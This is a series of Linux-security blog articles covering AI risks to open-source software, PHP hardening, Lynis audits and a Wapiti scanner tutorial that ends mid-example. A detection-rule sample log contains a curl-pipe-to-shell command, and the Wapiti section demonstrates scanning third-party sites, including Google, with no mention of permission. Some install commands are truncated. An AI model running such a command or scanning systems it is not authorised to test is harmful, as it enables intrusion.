It’s hard to think of a technology more impactful than Artificial Intelligence (AI). While it has been around for a while, it has only recently broken into the mainstream. Now that it has, it is rewriting the playbook for much of the tech industry, especially open-source software (OSS). In particular, advances in Large Language Models (LLMs) are changing the way we approach cybersecurity in OSS, introducing both new challenges and new defensive options.

As exciting as this new technological age can seem, it is not without downsides. AI is a tool, so whether its impact is good or bad depends on how people use it. As you might expect, cybercriminals have not taken long to take advantage of it. Conversely, you can use open-source AI tools to fight these threats and improve security in Linux environments. Let's take a closer look at the impact, both positive and negative, that advances in AI are having on open-source security.

AI-Driven Security Threats Targeting Open-Source Ecosystems

AI-driven threats are cause for concern in any context, but open-source platforms are sometimes uniquely vulnerable. Over the past two years, attacks against the OSS supply chain grew by almost 280%. You can’t blame AI for all of this, but it likely played a role. AI models can be used to automate attacks and increase their sophistication: LLMs such as GPT-3 can draft convincing phishing messages and working malicious code, raising the risk of contributor spoofing and prompt injection attacks. Openly available AI tools make it easier than ever to develop advanced threats, and given how much the world relies on OSS, open repositories make ideal targets. Here is a closer look at a few of the most common AI-driven threats amid this trend.
Contributor Spoofing

The collaborative nature of OSS makes it particularly prone to spoofing attacks. While you do not need AI to impersonate a trusted contributor and inject backdoors into open-source code, generative models make it much easier. Security researchers have shown that tools like GPT-3 can craft more effective phishing attacks than humans, even when the victims are cybersecurity professionals. The danger for OSS is that criminals can use AI to build convincing contributor personas and, once trusted, add malicious code to otherwise secure repositories in ways that are difficult to detect.

OSS’s openness also means more eyes can spot these attacks, but that does not always work out as you would hope. You may remember how the Linux ecosystem narrowly avoided a serious compromise after a contributor found a backdoor that had gone unnoticed for far too long. It is unclear whether AI played any part in that backdoor, and, thankfully, someone caught it before it caused damage. But the incident is a chilling reminder of what such an attack could do. As AI makes it harder to catch malicious code and contributors, backdoors like this could become more common.

Prompt Injection

AI prompt injection is a related threat facing open-source environments. Interestingly, these attacks both use AI and target it. With the help of code-generating AI tools, attackers can craft malicious prompts that alter an open-source model’s output. That is possible without automation, but automation raises the odds of injecting something the target model and its contributors will not detect. Data poisoning has been a concern for almost as long as machine learning has existed, and prompt injection has joined it with the rise of LLMs. The industry’s move toward open-source models could make this threat all the more prominent: a whopping 80% of IT leaders plan to use more open-source tools in their AI projects.
That trend makes open machine learning models a more promising target for prompt injection attacks. A single successful incident could affect multiple companies’ AI applications, and these injections will get harder to spot as generative AI makes it easier to ramp up their complexity. As LLMs and AI tools become more advanced, the threat continues to grow. Cybercriminals can misuse open-source AI to influence the behavior of machine learning models, making it crucial to verify the integrity of any model you use in OSS before you deploy it.

Defensive tooling has improved too. You can use reconnaissance tools like Recon-ng and others catalogued in the OSINT Framework to scour the web for information on developing trends and newly found vulnerabilities. Using proactive monitoring like this to stay ahead of evolving attacks can help you spot malicious code or compromised AI models before you deploy them.

Over-Reliance on AI Coding Tools

How open-source contributors use AI can pose risks, too. One of the most exciting use cases for AI in OSS is automated coding. With AI tools to write and check code, you can develop applications in much less time, but over-relying on them can leave you vulnerable. For all of AI’s strengths, it is not as good at programming as a human expert, and that becomes a bigger concern if you take its output at face value and assume it is giving you solid, safe code. What if you generate a few lines, do not double-check them, and plug them into your software only to find they contain glaring holes? These concerns are not hypothetical: one study found that about 40% of the code produced by a popular generative tool contained flaws or bugs that made it vulnerable to attack, highlighting the need for human oversight.
Those models have improved since then, but they are still imperfect. The solution is to treat AI-generated code as untrusted input: always review and test it before using it. AI-assisted analysis tools can help find vulnerabilities, too. Even so, these security gaps could become more common as people grow more comfortable with automation.

How Can I Leverage Open-Source AI Tools for Threat Detection on Linux?

AI-driven threats are likely more than a passing trend. Almost nine in 10 security experts expect them to remain relevant for the foreseeable future. It is time for the open-source community to take AI threats seriously, which means fighting fire with fire.

Open-Source Threat Detection Tools Today

While opening software development to everyone can create risks related to backdoors and malicious code injection, it also lets you develop effective security solutions faster. The community has already done a good job of matching cybercriminals’ use of AI with AI-driven security, so you have plenty of open-source AI threat detection tools to choose from today.

One of the most popular open-source AI frameworks, TensorFlow, has extensive threat detection applications. Because the platform is so widely used, it gets a lot of attention from the security community, and you can find plenty of anomaly detection models and how-to guides for building AI-driven vulnerability management tooling on TensorFlow in your Linux environment. LangChain, a framework for building applications on top of LLMs, can chain a model together with tools and data sources so that an analyst can query security data in natural language and inspect the inputs and outputs of each step; that makes it easier to debug LLM-backed security workflows and confirm that threats are being identified and handled as intended.

Apache Metron was another popular open-source threat detection platform, though Apache has since retired it. Some alternatives have taken its place: developers who had built on Metron went on to release similar but improved solutions such as Siembol and HELK.
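Whichever framework you build on, detection tooling of the kind surveyed above comes down to rules evaluated over events. The following is an added example, not code from this article or from any project it names: a small Python matcher that applies a Sigma-style rule (Sigma is the vendor-neutral detection rule format discussed later under incident response) to process-creation events. The rule, the field names (ParentImage, Image, CommandLine, host) and the four JSON log lines are all constructed for the example; the rule is written as a Python dict mirroring Sigma’s detection/selection/filter/condition layout so no YAML library is needed.

```python
"""Apply a Sigma-style detection rule to JSON process-creation events.

Added example (not from the article or any project it names). The rule mirrors
the layout of a Sigma rule (detection -> selection/filter maps, condition
string) as a Python dict instead of YAML, so no YAML library is needed. Field
names and the sample events are constructed for this example.
"""
import json
import re

# Constructed rule: a web server process spawning a shell is suspicious,
# except for a known health-check script.
RULE = {
    "title": "Web server spawning a shell",
    "logsource": {"product": "linux", "category": "process_creation"},
    "detection": {
        "selection": {
            "ParentImage|endswith": ["/apache2", "/nginx", "/php-fpm"],
            "Image|endswith": ["/sh", "/bash", "/dash"],
        },
        "filter": {
            "CommandLine|contains": "/opt/healthcheck.sh",
        },
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed events, one JSON object per line (assumed field names).
SAMPLE_LOG = """\
{"host": "web1", "ParentImage": "/usr/sbin/apache2", "Image": "/bin/sh", "CommandLine": "sh -c id"}
{"host": "web1", "ParentImage": "/usr/sbin/apache2", "Image": "/bin/sh", "CommandLine": "sh /opt/healthcheck.sh"}
{"host": "web1", "ParentImage": "/usr/sbin/sshd", "Image": "/bin/bash", "CommandLine": "-bash"}
{"host": "web2", "ParentImage": "/usr/sbin/php-fpm", "Image": "/usr/bin/dash", "CommandLine": "dash -c 'curl http://203.0.113.9/x | sh'"}
"""

# Sigma value modifiers; Sigma string matching is case-insensitive by default.
MODIFIERS = {
    "": lambda value, pat: value.lower() == pat.lower(),
    "contains": lambda value, pat: pat.lower() in value.lower(),
    "startswith": lambda value, pat: value.lower().startswith(pat.lower()),
    "endswith": lambda value, pat: value.lower().endswith(pat.lower()),
    "re": lambda value, pat: re.search(pat, value) is not None,
}


def field_matches(event, spec, patterns):
    """A 'Field|modifier' spec matches when ANY of its listed values matches."""
    field, _, modifier = spec.partition("|")
    if field not in event:
        return False
    if not isinstance(patterns, list):
        patterns = [patterns]
    match = MODIFIERS[modifier]
    return any(match(str(event[field]), str(p)) for p in patterns)


def map_matches(event, mapping):
    """A selection or filter map matches only when ALL its specs match."""
    return all(field_matches(event, spec, pats) for spec, pats in mapping.items())


def rule_matches(rule, event):
    """Evaluate a flat condition such as 'selection and not filter'."""
    detection = rule["detection"]
    result = None
    op = "and"
    negate = False
    for token in detection["condition"].split():
        if token in ("and", "or"):
            op = token
        elif token == "not":
            negate = True
        else:
            value = map_matches(event, detection[token])
            if negate:
                value = not value
                negate = False
            if result is None:
                result = value
            elif op == "and":
                result = result and value
            else:
                result = result or value
    return bool(result)


def scan(log_text, rule=RULE):
    """Return the events (as dicts) that the rule flags, in log order."""
    hits = []
    for line in log_text.splitlines():
        if line.strip():
            event = json.loads(line)
            if rule_matches(rule, event):
                hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"[{RULE['level']}] {RULE['title']}: {hit['host']} {hit['CommandLine']}")
```

Run as-is it flags the first and fourth events (shells spawned by apache2 and php-fpm) and ignores the health-check invocation and the SSH login shell. To use it on real data, feed it JSON lines from your endpoint agent or auditd pipeline and rename the fields in the rule to match that source; the `filter` map is where you put known-good exceptions rather than weakening the selection.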
Deploying These Tools Effectively

These tools let you spot and contain threats faster and more accurately than you could alone, a crucial advantage as attacks against Linux and other OSS applications rise. Remember, any tool needs proper usage to reach its full potential.

Deploying AI threat detection tools effectively starts with choosing the right one. Given the threat of contributor spoofing and prompt injection, only use platforms from trusted developers with ongoing community support, and verify what you download (checksums, signatures and the provenance of any pretrained model) before running it. Choosing one from a library you already know is also best; familiarity helps avoid the human errors that play a role in 95% of cybersecurity incidents today. As with all open-source platforms, emphasize the configuration and testing stages: test, and test again, until you are certain you have set the tools up correctly and their code does not contain vulnerabilities.

Smarter Security, Smarter Code: When Linux Meets Coding AI

Security in Linux is quietly changing, not because of louder threats but subtler ones. Open-source systems now face new risks as AI is used to spoof contributors or slip in prompt injections; code that looks harmless can hide real danger. Alongside those threats, there is hope. Projects like TensorFlow and LangChain already underpin OSS defences that detect anomalies, trace suspicious behavior, and keep systems honest. At the same time, the latest wave of developer-focused AI is reshaping how teams work: whether you are asking agents to write and check code or to automate reviews, tools like Lindy, Replit, and GitHub Copilot have woven themselves into everyday workflows. It is an unfolding story, one where Linux admins and developers share the narrative, learning to trust AI without losing control.

How Can I Utilize AI to Strengthen Linux Security Auditing?

Similarly, you can use open-source tooling to perform ongoing Linux security audits.
These are important because you probably will not build an impenetrable system on your first try, and threats always change. As with threat detection, there are plenty of OSS solutions to automate security auditing.

One option is Lynis, which has been around since 2007 and supports Linux and other Unix-based operating systems. It performs specific tests depending on the components it discovers, so it automatically adapts and performs a more comprehensive scan as your environment grows.

OpenSCAP is another option. It consumes security content such as vulnerability definitions and configuration checklists to keep up with emerging threats, and it lets you audit against specific regulatory standards, so it is a good alternative if compliance is a pressing issue for your applications.

Once again, think about how you use these tools. Match auditing solutions to your existing OSS stack, configure them correctly before relying on them, and stay involved in their communities so you hear about necessary patches as soon as they are discovered.

Advancement of AI-Powered Network Security in Linux

Network security is another area where AI can improve Linux security. Linux network intrusion monitors have been around for a while, but as AI has matured, these platforms have become more reliable. Take Zeek, which first appeared as “Bro” in the 1990s. Since then, more than 10,000 deployments, 3,000 tracked network events, and 240 community-provided packages have pushed it to become a powerful, comprehensive network traffic analysis tool.

You can also find more specific intrusion detection tools today. One good option is Suricata, which can automatically detect protocols, traffic anomalies, and policy violations to streamline network detection and response. Snort is another open-source option; its vendor also sells a paid subscriber ruleset that delivers new detection rules ahead of the free community set.
AI and LLMs are not only useful for threat detection but also for proactive security measures. For example, pairing AI with a Network Intrusion Detection System (NIDS) improves its ability to spot anomalies in real time. Open-source projects like Suricata and Zeek continue to evolve alongside AI, offering robust network security on Linux. Regardless of your chosen solution, these tools help you detect network threats faster, so you can stop breaches before they cause too much damage and minimize the related costs.

Open-Source AI Frameworks for Security Incident Response

Of course, detecting a potential breach is just the first step. You also need to respond to these alerts to keep your Linux systems safe. Thankfully, open-source frameworks can streamline and improve this process, too.

While it is possible to respond to events manually, the rise of AI-based threats means you will likely face much higher incident volumes. In fact, 75% of security pros say they have noticed an uptick in attacks, and 85% say generative AI is to blame. Automated response tooling streamlines operations enough that you can keep up with this spike.

One of the most popular approaches is to use Sigma rules, a vendor-neutral detection signature format, to look for suspicious patterns in your event logs. You can build your own OSS solution to apply Sigma rules or use an off-the-shelf tool from an existing community. TheHive Project’s Cortex is another popular solution: it runs analyzers over observables like IP addresses, domain names, and file hashes to classify potential threats in one pass instead of running multiple programs by hand, giving you more time to respond instead of letting an attack spread while you figure out what it is.

Our Final Thoughts: Open-source Security Must Adapt to AI

AI is here to stay. That can both help and hinder open-source solutions in terms of cybersecurity. On one hand, attacks are more common and sophisticated than ever before.
On the other, you have more powerful tools at your disposal to stop them. Cybercriminals are already using AI to target OSS. It is now up to defenders to match them and use the same technology to build stronger defenses. The integration of AI in Linux systems is transforming organizational security, addressing threats and challenges with adaptive, intelligent solutions for protection.

Brittany Day
PHP (a recursive acronym for “PHP: Hypertext Preprocessor”) is one of the most popular server-side programming languages, and some of the biggest names on the Internet build their businesses on it. PHP helps companies build websites, create applications, and manage their systems.

Although PHP is a powerful language that lets companies explore their online potential, it is not secure by default, and careless deployments leave organizations at risk of breaches, attacks, and other incidents that could destroy a business’s reputation. Fortunately, there are measures you can take to strengthen your PHP applications against network security threats. This article explains PHP’s relevance today, application pentesting, and best practices for mitigating attacks.

How Do Companies Use PHP for Security? Is It Still Relevant?

PHP is still relevant, and PHP applications can be assessed effectively for the risks they carry. Companies identify vulnerabilities using application pentesting tools that simulate attacks against the running system. This kind of testing finds flaws in application code that would let threat actors take over websites and compromise sensitive data: insecure coding, misconfigured settings, broken authentication controls, and information leaks. Once found, you can fix the data and network security issues straight away. If you plan to hire dedicated PHP developer teams, make sure they follow the secure coding practices below.

What Insecurities Do PHP Web Applications Have?

Many PHP deployments run a Content Management System (CMS) such as WordPress, Joomla, Magento, or Drupal. These platforms add a great deal of functionality, but they, and especially their third-party plugins and themes, regularly harbor vulnerabilities that let attackers bypass the security of the site that runs them.
According to one report, WordPress’s share of vulnerabilities rose from 74 to 83 percent in about a year. Fortunately, these projects consistently work to improve their security posture so that the software stays safe for users.

How Can Application Pentesting Benefit Businesses?

As the name suggests, application pentesting focuses on identifying vulnerabilities in your web applications and the server that hosts them, including missing patches. Pentesting can find flaws in code that would let attackers breach your system and steal credentials or data. With this technique, you learn about misconfigurations, broken authentication, access control weaknesses, information leaks, and more. Once you know the risks, you can remediate them before threat actors exploit them.

What PHP Best Practices Should I Employ to Strengthen Security?

1. Always use the latest version of PHP

Use a currently supported PHP release. Only supported branches receive security fixes, so running an end-of-life version means known vulnerabilities stay unpatched.

2. Properly configure the php.ini file and other requisites

Start by tailoring the session settings to your deployment:

    session.save_path       (a filesystem directory the web server can write to, outside the document root)
    session.cookie_path     (the URL path the session cookie is sent for)
    session.cookie_domain   (the host the session cookie is sent to)

After configuring those, there are several other settings you can edit to keep your PHP application secure. Here is the checklist:

    expose_php = Off

This stops PHP from advertising itself. When enabled, PHP adds an X-Powered-By header (e.g. X-Powered-By: PHP/8.1.2) to every response, telling everyone that PHP is installed on that server and which version. This applies regardless of the web server in front of it, nginx included.
    allow_url_include = Off

Prevents include and require from loading code from remote URLs, which blocks the remote file inclusion route to code execution.

    display_errors = Off

Controls whether error messages are printed in the page for every visitor. Disable it in production and log errors instead (log_errors = On).

    session.cookie_httponly = 1

Stops JavaScript from reading the session cookie via document.cookie, which limits what an XSS payload can steal. Use with care if front-end code legitimately reads the cookie.

    session.use_strict_mode = 1

Rejects session IDs the server did not generate, which prevents session fixation.

    session.cookie_secure = 1

Requires the session cookie to be transmitted over HTTPS only.

    session.cookie_samesite = Strict

Stops the browser from sending the session cookie on cross-site requests, which blunts CSRF.

    session.use_trans_sid = 0

Prevents session IDs from being propagated in URLs, where they leak through logs and Referer headers.

    session.sid_length = 128
    session.sid_bits_per_character = 6

Together these make session IDs long and dense enough that guessing one by brute force is impractical.

    file_uploads = Off

Disables file uploads entirely. If uploads are required, keep them enabled but cap the size, for example:

    upload_max_filesize = 1M

3. Use up-to-date code dependencies and third-party components, and update your web server!

Keep your web server, code dependencies, and third-party components current so that known vulnerabilities are patched. If you use Apache, keep it updated, turn on error logging, add a firewall, set HTTP request limits, and disable modules you do not use. Install mod_evasive, which helps keep the server responsive under request floods. Serve the site over TLS with a valid certificate to protect data in transit.

4. Do not store passwords using reversible encryption

Avoid storing passwords with reversible encryption: if an attacker obtains the static decryption key along with the database, every password is recovered at once.
Hash passwords with a slow, salted password hashing algorithm such as bcrypt or Argon2; in PHP, password_hash() and password_verify() do this correctly by default. Do not use AES or any other encryption for this purpose, and do not use fast general-purpose hashes such as MD5 or SHA-256 on their own, since they can be brute-forced at high speed. Properly hashed passwords protect your users even if the database is stolen.

5. Don’t rely on cookies for security

Never trust the contents of a cookie on their own: anything the client can read it can also modify. Keep sensitive state server-side and put only an opaque session ID in the cookie. If you must store data in a cookie, authenticate and encrypt it with Halite (built on libsodium) or libsodium directly; if you use OpenSSL, choose an authenticated mode such as AES-256-GCM rather than plain CBC, which protects confidentiality but not integrity.

6. Validate user input

Validate every form field, URL parameter, and JSON payload before PHP code acts on it, for example with filter_var(), as below. Validation shrinks the attack surface for Cross-Site Scripting (XSS), injection, and other malicious input; output escaping is still required separately.

    function is_valid_email($email = "") {
        return filter_var(trim($email), FILTER_VALIDATE_EMAIL) !== false;
    }

7. Perform regular security audits

Perform web and cloud security audits to identify application vulnerabilities so you can patch them before an attack. Such audits can improve response times and make application performance more reliable. Web security scanners can check for Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), SQL injection, PHP code injection, cookie-based denial-of-service issues, and timing attacks.

8. Use PHP Libraries

Use well-maintained PHP libraries so your developers can build secure functionality instead of re-implementing it. Consider the following coding options for preparing your server.

Final Thoughts on PHP Security

Running PHP on your server makes hardening it essential to robust data and network security. Threat actors like to take advantage of openings left behind by poor configuration, so follow the PHP security practices discussed here to improve your security posture.
Regularly perform web and cloud security audits to identify PHP security issues before they become a substantial risk. AI-driven security strategies are becoming increasingly important in proactively identifying and mitigating sophisticated cyber threats, and PHP applications may also need to account for them in their evolving security protocols.

Strengthen PHP applications against network security threats with best practices, pentesting solutions, and expert tips.

Brian Gomez
running processes, configuration files, and more to determine what areas throughout a system need fixing to improve security posture. Such tools even offer information on how to make those adjustments.

Lynis is an open-source auditing tool that performs extensive system health scans to support system hardening and compliance testing. Lynis supports Unix-based operating systems, including Linux, and examines a system for general information, vulnerable software packages, and configuration issues. Unlike auditing tools that only report findings, Lynis provides in-depth auditing for continuous improvement. The tool assists with configuration, asset, and software patch management, as well as system hardening, pentesting, and intrusion detection.

Lynis is aimed at system administrators, auditors, security officers, pentesters, and security professionals who need help hardening systems, running daily scans, prioritizing patches, and locating weaknesses. This article discusses installing Lynis, running the auditing tool and reading its reports, and the various testing options available.

Auditing Steps

Lynis scans systems in a modular and opportunistic way, testing the components it finds. The more it finds, the more extensive the scan, and no additional toolkits need to be installed for Lynis to complete a scan.
The nine steps of a Lynis audit are as follows:

1. Initializing
2. Performing basic checks
3. Determining the operating system and available tools
4. Searching for available software components
5. Checking for the latest Lynis version
6. Running enabled plug-ins
7. Testing security in each category
8. Executing your custom tests (optional)
9. Reporting the status of the security scan to the user

All information found is stored in “lynis.log”. A separate file, “lynis-report.dat”, contains the suggestions and warnings.

Installation & Running

First, install Lynis from the CISOfy repository:

    sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys C80E383C3DE9F082E01391A0366C67DE91CA5D5F
    sudo apt install apt-transport-https
    echo "deb stable main" | sudo tee /etc/apt/sources.list.d/cisofy-lynis.list
    sudo apt update
    sudo apt install lynis
    lynis show version

The last command shows which Lynis version you have before you use it on your system. To run an audit of the whole system:

    lynis audit system

If you run from a source checkout instead, change into the lynis directory and run it in place:

    cd lynis
    ./lynis audit system

Running “./lynis” with no arguments lists the available commands, and “lynis audit system” executes the checks across your entire system. Other options include:

    lynis audit system remote      Remote security scan
    lynis audit dockerfile         Analyze a Dockerfile
    lynis --forensics              Forensics on a running or mounted system
    lynis --pentest                Pentesting mode

You can also schedule daily scans with cron. In /etc/crontab (or a file under /etc/cron.d/, both of which take a user field), add:

    30 22 * * * root /path/to/lynis -c -Q --auditor "automated" --cronjob

This runs the scan at 10:30 P.M. every day, writing results to “lynis.log”.

About the Reports

Once an audit completes, Lynis produces several outputs:

Result: on screen, each test reports “ok” or “warning”, “found” or “not found”, “none” or “done”, depending on the test and its outcome.

Log file: shows action/event times, why a test failed or was skipped, internal test output, configuration suggestions, and threat impact scores.
Report file: the information and data Lynis gathers is written here, so you can see remarks, sections, and options/values.

Lynis generates details on package installations, plug-in scans, and system boot and services so you know what security issues exist on your system. It is thorough, also covering printers and spools, software messaging and firewalls, insecure services, SSH support, SNMP support, databases, LDAP services, kernel, memory and processes, kernel hardening, users, groups and authentication, shells, file systems, file permissions, and more.

When reading screen output, the colors make the results easier to read:

Green: the check passed, or the feature in question is disabled.
Yellow: Lynis skipped a test, could not find something, or has a suggestion.
Red: something needs attention and is unsafe.

At the end of the scan, Lynis lists each warning and suggestion with its test ID. Run “lynis show details TEST-ID” to see what that test checked and how to mitigate the issue.

Other Lynis Options

Custom Tests

You can choose particular tests to run with “lynis show tests”, which lists the tests available on your OS with their descriptions so you can pick the ones relevant to the issues you are scanning for. Useful commands:

    lynis show tests
    ./lynis update info
    cat /var/log/lynis.log | grep KRNL
    ./lynis -c -Q
    ./lynis --tests "TEST-ID"

These let you see which tests exist, check for updates, pull the kernel-related lines from the log, run a quick scan, and run only the tests whose IDs you specify.

Lynis with Categories

If you would rather not use test IDs, run tests by category. For example, for firewalls:

    ./lynis --tests-from-category "firewalls"

Our Final Thoughts on Lynis

Keep your system secure and up to date with auditing tools like this to ensure your system stays healthy.
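To act on the report file described above without reading it by hand, for example from the nightly cron job in the installation section, here is an added example, not code from the article or from the Lynis project: a Python script that parses lynis-report.dat, groups warnings and suggestions by test ID so they can be looked up with “lynis show details”, and returns a pass/fail verdict from the hardening index and warning count. It assumes the key=value layout Lynis writes, with repeated keys suffixed “[]” and pipe-separated warning/suggestion fields; the report excerpt is constructed for the example and the thresholds are arbitrary.

```python
"""Parse lynis-report.dat and turn it into a pass/fail verdict.

Added example, not code from the article or from the Lynis project. Assumed
layout of the report: one key=value per line, repeated keys end in "[]", and
warning/suggestion values are pipe-separated "TEST-ID|message|details|-|".
The excerpt below is constructed for this example.
"""
import sys
from collections import defaultdict

SAMPLE_REPORT = """\
# Lynis Report (constructed excerpt)
report_version_major=1
lynis_version=3.0.9
hardening_index=63
warning[]=FIRE-4512|iptables module(s) loaded, but no rules active|-|-|
warning[]=SSH-7408|SSH option PermitRootLogin is set to yes|-|-|
suggestion[]=SSH-7408|Consider hardening SSH configuration|PermitRootLogin (set YES to NO)|-|
suggestion[]=KRNL-6000|One or more sysctl values differ from the scan profile|-|-|
suggestion[]=PKGS-7392|Install security updates|-|-|
"""


def parse_report(text):
    """Return scalar keys as strings and '[]' keys as lists of strings."""
    data = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.endswith("[]"):
            data.setdefault(key[:-2], []).append(value)
        else:
            data[key] = value
    return data


def findings(report, kind):
    """Split 'warning' or 'suggestion' entries into (test_id, message) pairs."""
    pairs = []
    for entry in report.get(kind, []):
        parts = entry.split("|")
        if len(parts) >= 2 and parts[0]:
            pairs.append((parts[0], parts[1]))
    return pairs


def by_test(report):
    """Group findings by test ID, the key you pass to 'lynis show details'."""
    grouped = defaultdict(lambda: {"warnings": [], "suggestions": []})
    for test_id, msg in findings(report, "warning"):
        grouped[test_id]["warnings"].append(msg)
    for test_id, msg in findings(report, "suggestion"):
        grouped[test_id]["suggestions"].append(msg)
    return dict(grouped)


def gate(report, min_index=70, max_warnings=0):
    """True when the host passes: index at or above min_index and no more than
    max_warnings warnings. Thresholds are arbitrary for the example."""
    index = int(report.get("hardening_index", "0"))
    return index >= min_index and len(report.get("warning", [])) <= max_warnings


def main(argv):
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_REPORT
    report = parse_report(text)
    print(f"Lynis {report.get('lynis_version', '?')}, hardening index {report.get('hardening_index', '?')}")
    for test_id, group in sorted(by_test(report).items()):
        for msg in group["warnings"]:
            print(f"  WARNING    {test_id}: {msg}")
        for msg in group["suggestions"]:
            print(f"  suggestion {test_id}: {msg}")
    return 0 if gate(report) else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Point it at the real file (by default /var/log/lynis-report.dat) as the first argument and use the exit status in your cron or CI job; with the constructed excerpt it exits 1 because the index is below 70 and two warnings are open.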
Lynis is an excellent option, offering comprehensive auditing and improvement suggestions. Its detailed reports cover the whole system, making it easier to understand system health and which categories need your attention. Lynis is easy to install and understand, with color-coded reports and various scanning options. Run Lynis with plug-ins and customize your scans so you stay on top of the latest vulnerabilities and data and network security issues.

Do you use an auditing tool to maintain the health of your systems? If not, try out Lynis! We’d love to hear your thoughts: connect with us on X @lnxsec and let’s discuss!

Lynis conducts rigorous assessments of system integrity to bolster protection measures and elevate compliance protocols.

Zaid AlBukhari
Globally, there are roughly 30,000 web-based cyberattacks daily, primarily targeting smaller businesses and smaller websites. To put that into perspective, that is roughly one attack on a website every three seconds.

Cybercriminals will not hesitate to attack your website, so how can you find security issues and entry points before they do? The answer is a website vulnerability scanner. Follow along as we look at what a vulnerability scanner is and how we use the Wapiti web scanner to test websites.

What is a Website Vulnerability Scanner? Do YOU Need It?

Before we get into Wapiti, let's define a website vulnerability and how a scanner can help. A website vulnerability is a flaw in the code of a website or web application that allows cybercriminals to gain control of the site and possibly the web hosting server. Cybercriminals write scripts that scrape the web for specific platforms with known, publicized vulnerabilities they can exploit to steal information, access confidential documents or data, spam the site, or inject scripts. If these attacks succeed, they can cause lasting damage to a business's infrastructure and public image and raise questions about whether the company can keep its data, and that of future clients, secure.

Understanding and preventing website vulnerabilities is especially important for any business that maintains or plans to maintain a website or web application. A website vulnerability scanner is designed to look for these flaws in web applications and web servers. Because cybercriminals are quick to exploit them, you should run a web scanner regularly as well.
Routine web vulnerability testing lets you patch security flaws before attackers can exploit them. These scanners probe the running application for web flaws like SQL injection, cross-site scripting (XSS), and path traversal.

Wapiti Scanner: Brief Description

Wapiti lets you audit the security of your web applications. It performs "black-box" scans: it does not examine the application's source code but crawls the deployed web app's pages looking for scripts and forms into which it can inject data. Wapiti then acts like a fuzzer, injecting payloads to see whether a script is vulnerable.

Wapiti Features

Main scanning features:

SQL injections (error-based, boolean-based, time-based) and XPath injections

SQL injection is a type of injection attack that makes it possible to execute malicious SQL statements against the database server behind a web application. Attackers use SQL injection vulnerabilities to bypass application security measures. Scanning for SQLi is a must to make sure sensitive information cannot be accessed and to harden your server against SQL injection attacks.

XPath injection is an attack in which malicious user input grants unauthorized access or reveals sensitive information such as XML document structure and content. It works by getting the user's input used in the construction of an XPath query string. Wapiti's XPath injection checks test how your application handles malicious XPath queries; if the scan finds no vulnerabilities, the parameter is treated as safe.

Cross-Site Scripting (XSS), reflected and permanent

Cross-site scripting targets an application's users by injecting code, usually a client-side script such as JavaScript, into the web application's output.
The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the attacker. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface websites or redirect the user to malicious sites.

Cross-Site Request Forgery (CSRF), basic detection

Cross-site request forgery is a malicious attack where a user is tricked into performing an action he or she didn't intend to do. A third-party website will send a request to a web application that a user is already authenticated against (e.g. their bank). The attacker can then access functionality via the victim's already authenticated browser. Targets include web applications like social media, in-browser email clients, online banking, and web interfaces for network devices.

CRLF Injection

CRLF injection attacks are one of several types of injection attacks. They can be used to extend more malicious attacks such as cross-site scripting, page injection, cache poisoning, and cache-based tampering. A CRLF injection attack occurs when cybercriminals are able to inject CRLF characters into a web application. The most common use for CRLF injection attacks is log poisoning, where the cybercriminal forges log file entries which ultimately can be used to hide other attacks or confuse system administrators. Although CRLF isn't amongst the most commonly known web vulnerabilities, it is still a big threat. Because CRLF injections are used to hide and escalate possibly stronger and potentially more dangerous attacks, it is best to use a scanner to help mitigate the exploitation of this vulnerability.

XXE (XML eXternal Entity) Injection

An XML External Entity attack is an attack that abuses a widely available but rarely used feature of XML parsers. Using XXE, cybercriminals are able to cause denial of service attacks on top of being able to access local and remote content and services.
XXE can be used to perform server-side request forgery, forcing the web application to make requests to other applications. Furthermore, XXE may even enable port scanning and lead to remote code execution. There are two types of XXE attacks: in-band and out-of-band. Cybercriminals can use XML entities to cause a denial of service by embedding entities within entities within entities.

Other Scanning Features:

- File disclosure detection (local and remote include, require, fopen, readfile...)
- Command execution detection (eval(), system(), passthru())
- Search for potentially dangerous files on the server
- Bypass of weak htaccess configurations
- Search for copies (backups) of scripts on the server
- Shellshock
- Folder and file enumeration
- Server Side Request Forgery
- Open redirects
- Detection of uncommon HTTP methods
- Basic CSP evaluator
- Brute force login form
- Checking HTTP security headers
- Checking cookie security flags
- Fingerprinting of web applications using the Wappalyzer database
- Enumeration of WordPress and Drupal modules
- Subdomain takeover detection
- Log4Shell (CVE-2021-44228) detection

Wapiti supports both GET and POST HTTP methods for attacks. It also supports multipart and can inject payloads in filenames. Furthermore, Wapiti displays a warning when an anomaly is found, and it distinguishes between permanent and reflected XSS vulnerabilities.

How to Install Wapiti for Linux Distributions:

With root permission, update the apt database with apt-get using the command:

root@server:~# apt-get update

Kali Linux and Ubuntu Installation:

root@kali:~# apt-get install wapiti

Debian Installation:

root@debian:~# apt -y install wapiti

UNIX-like Systems Installation:

Prerequisites: Packages must be updated and Python must be installed.
Run the command apt-get install python3 OR apt-get install python. Let's grab the most recent Wapiti tar file from their page using the command below:

root@kali:~# wget githubusercontent

Let's extract the tar file from our download using the command below:

root@kali:~# tar -xzvf wapiti3-3.1.2.tar.gz

Extracting the tar file will create a directory in the directory in which you downloaded and extracted the tar file. Below, let's change to that directory using the cd command:

root@kali:~# cd wapiti3-3.1.2/

We should now be in the wapiti3-3.1.2 directory. If we run the ls command, we should see the contents of the directory:

root@kali:~/wapiti3-3.1.2# ls
Bin INSTALL.md MANIFEST.in README.rst setup.py wapiti3.egg-info Doc LICENSE PKG-INFO setup.cfg VERSION wapitiCore

We should now be able to install Wapiti by running the command python3 setup.py install, just like below:

root@server:~/wapiti3-3.1.2# python3 setup.py install

Wapiti Help:

For this instance, I used Kali Linux. Run the command wapiti -h to pull up a list of arguments that wapiti accepts.

Wapiti in Action:

For this instance, I will be using Kali Linux. Let's use Wapiti to test two sites, one that is generally considered secure and one that is vulnerable. Run the command below, substituting the proper URL:

root@kali:~# wapiti -v2 -u https://monsterhost.com/promo/

Google.com Test:

For this example, we ran this command against Google. This is what wapiti will output:

